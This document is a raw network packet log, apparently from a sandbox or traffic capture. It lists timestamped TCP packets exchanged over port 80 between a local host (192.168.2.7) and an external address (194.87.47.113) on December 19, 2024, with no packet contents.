Dec 19, 2024 08:47:32.138284922 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.138731003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.139170885 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.139266968 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.139559984 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.139746904 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.139777899 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.140327930 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.140779018 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.140816927 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.141148090 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.141343117 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.141380072 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.141923904 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.142162085 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.142205000 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.142738104 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.142950058 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.143004894 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.143481970 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.143887997 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.143925905 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.144289970 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.144646883 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.144714117 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.145117998 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.145354986 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.145467997 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.145899057 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.146533966 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.146627903 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.146693945 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.146991014 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.147028923 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.147488117 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.148282051 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.148299932 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.148355961 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.148627043 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.148673058 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.149142027 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.149487972 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.149554968 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.149844885 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.150181055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.150221109 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.150610924 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.150885105 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.150935888 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.151395082 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.151597977 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.151626110 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.152209997 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.152395964 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.152441025 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.152985096 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.153393984 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.153434038 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.153784990 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.153992891 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.154035091 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.154578924 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.155334949 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.155401945 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.155556917 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.155597925 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.155632973 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.156325102 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.156712055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.156755924 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.156960964 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.157260895 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.157324076 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.157722950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.158168077 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.158200026 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.158548117 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.158564091 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.158602953 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.307404995 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.307796001 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.307812929 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.307987928 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.308281898 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.308325052 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.308707952 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.308725119 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.308820963 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.309319973 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.310228109 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.310561895 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.310645103 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.310661077 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.310729980 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.311115980 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.311461926 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.311477900 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.311511040 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.312228918 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.312324047 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.312972069 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.313258886 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.313325882 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.313512087 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.313528061 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.313641071 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.313994884 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.314697027 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.314884901 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.314901114 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.314917088 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.314944029 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.315604925 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.315622091 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.315658092 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.316266060 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.316767931 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.316821098 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.317148924 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.317173958 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.317274094 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.320662975 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.320683002 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.320732117 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.320782900 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.321098089 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.321177006 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.321481943 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.321818113 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.321877956 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.322211981 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.322527885 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.322566986 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.322990894 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.323191881 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.323232889 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.323779106 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.324012995 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.324110031 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.324589968 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.324757099 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.324832916 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.325372934 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.325679064 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.325717926 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.326150894 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.326548100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.326598883 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.326953888 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.327351093 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.327405930 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.327791929 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.327809095 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.327858925 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.328541040 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.328764915 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.328807116 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.329359055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.329719067 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.329776049 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.330140114 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.330306053 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.330348969 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.330934048 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.331125975 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.331190109 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.331706047 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.332058907 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.332112074 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.332489967 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.332675934 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.332729101 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.333317041 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.333606958 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.333807945 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.334089041 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.334393024 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.334506035 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.334877014 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.335078001 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.335201979 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.335676908 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.335974932 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.336061954 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.336469889 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.336723089 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.336899042 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.337266922 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.337466002 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.337507963 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.338064909 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.338227987 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.338263988 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.338875055 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.339052916 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.339232922 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.339623928 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.339823008 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.339899063 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.340461016 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.340615988 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.340658903 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.341316938 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.342056990 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.342075109 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.342107058 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.342360020 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.342433929 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.342812061 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.343230963 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.343277931 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.343591928 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.344268084 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.344311953 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.344489098 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.344508886 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.344542980 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.345200062 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.345475912 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.345530987 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.345969915 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.346163034 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.346219063 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.346736908 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.347151041 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.347194910 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.347548008 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.348056078 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.348148108 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.348336935 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.348608971 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.348656893 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.349116087 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.349555016 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.349668026 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.349927902 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.350110054 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.350186110 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.350682974 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.350852966 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.350900888 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.499597073 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.499721050 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.499953032 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.500153065 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.500185013 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.500308990 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.500790119 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.501142025 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.501219988 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.501543045 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.502298117 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.502382994 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.502650023 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.502846003 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.502861977 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.502891064 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.503518105 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.503623962 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.503860950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.504266977 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.504308939 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.505340099 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.505567074 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.505584955 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.505676985 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.506222010 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.506264925 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.506597042 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.506613970 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.506655931 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.507265091 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.507606030 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.507657051 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.507997036 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.508389950 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.508440018 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.508877039 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.508894920 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.508965969 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.509470940 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.509696007 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.509797096 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.512447119 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.512686014 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.512752056 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.513011932 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.513330936 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.513375998 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.513720989 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.513736963 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.513794899 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.514393091 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.514646053 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.514689922 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.515005112 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.515435934 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.515505075 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.515671015 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.516196012 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.516244888 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.516659021 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.517003059 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.517066002 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.517203093 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.517785072 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.517880917 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.517971039 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.518583059 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.518642902 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.518810987 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.519396067 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.519448996 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.519551992 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.520158052 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.520205975 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.520340919 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.521014929 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.521135092 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.521188021 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.521752119 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.521815062 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.522061110 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.522555113 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.522614002 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.522758961 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.523490906 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.523611069 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.523991108 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.524171114 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.524224997 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.524552107 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.524933100 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.525000095 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.525310040 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.525712013 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.525861025 CET	49707	80	192.168.2.7	194.87.47.113
Dec 19, 2024 08:47:32.525981903 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.526523113 CET	80	49707	194.87.47.113	192.168.2.7
Dec 19, 2024 08:47:32.526583910 CET	49707	80	192.168.2.7	194.87.47.113
